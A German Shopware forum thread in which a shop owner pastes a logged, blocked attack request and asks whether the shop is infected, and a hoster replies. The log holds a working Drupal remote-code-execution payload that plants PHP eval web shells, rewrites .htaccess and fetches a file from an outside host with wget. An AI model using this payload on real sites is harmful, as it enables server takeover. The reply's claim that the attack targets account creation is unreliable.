# Ist mein Shop infiziert worden?

**URL:** <https://forum.shopware.com/t/ist-mein-shop-infiziert-worden/59003>\
**Category:** Administration\
**Created:** [9. April 2019 um 09:45 UTC](https://forum.shopware.com/t/ist-mein-shop-infiziert-worden/59003 "2019-04-09T09:45:50Z")\
**Posts on this page:** 2\
**Page:** 1

<div class="post-metadata">

**Author:** ![SebastianS](https://avatars.discourse-cdn.com/v4/letter/s/a9adbd/32.png) [@SebastianS](https://forum.shopware.com/u/SebastianS)\
**Post date:** [9. April 2019 um 09:45 UTC](https://forum.shopware.com/t/ist-mein-shop-infiziert-worden/59003/1 "2019-04-09T09:45:50Z")

</div>

Hallo liebes Forum,

ich habe eine email mit folgendem Inhalt erhalten, und mache mir jetzt sorgen dass mein Shop infiziert worden sein könnte.

```
CRITICAL
Message: 	

The provided X-CSRF-Token for path "/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27" is invalid. Please go back, reload the page and try again.

Time: 	

2019-04-07T10:44:02.332608+0200

Channel: 	

core

request: 	

{
    "uri": "/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27",
    "method": "POST",
    "query": {
        "q": "user/password",
        "name": {
            "#post_render": [
                "passthru"
            ],
            "#type": "markup",
            "#markup": "echo 'Vuln!! patch it Now!' > vuln.htm; echo 'Vuln!!'> sites/default/files/vuln.php; echo 'Vuln!!'> vuln.php; cd sites/default/files/; echo 'AddType application/x-httpd-php .jpg' > .htaccess; wget 'http://40k.waszmann.de/Deutsch/images/up.php'"
        }
    },
    "post": {
        "_triggering_element_name": "name",
        "form_id": "user_pass"
    }
}

session: 	

No session data available

```

&nbsp;

War das nur der Versuch einer Infektion? Kann mit eventuell jemand weiter helfen?

&nbsp;

Viele Grüße

Sebastian

---

<div class="post-metadata">

**Author:** ![enerSpace](https://dub1.discourse-cdn.com/flex013/user_avatar/forum.shopware.com/enerspace/32/13552_2.png) [@enerSpace](https://forum.shopware.com/u/enerSpace)\
**Post date:** [9. April 2019 um 12:49 UTC](https://forum.shopware.com/t/ist-mein-shop-infiziert-worden/59003/2 "2019-04-09T12:49:15Z")

</div>

Hallo @SebastianS.‍,

auf dem ersten Blick würde ich jetzt sagen nein. Du hättest vermutlich dann nicht so eine Mail bekommen. Hier wurde der POST geblockt, weil der CSRF-Token nicht korrekt war. Eigentlich kannst du diese Fehlermeldungen ignorieren.

Grundsätzlich würde ich dir aber empfehlen, dass du im Backend die Einstellung vor nimmst, dass jeder Neu-Kunde ein Captcha-Code lösen muss, damit er sich registrieren kann. Bitte wähle nicht die Honeypot Version aus,&nbsp;diese&nbsp;wird mittlerweile durch SPAM-Bots&nbsp;umgangen.

Bitte informier dich auch darüber, ob in der letzten Zeit ungewöhnlich viele Kundenaccounts erstellt&nbsp;wurden, denn der Angriff zielt genau darauf ab.

VG

ener **Space** &nbsp;Webhosting  
Tel.: +49 511 - 999 791 70 | Web:&nbsp;[https://www.enerspace.de](https://www.enerspace.de/)
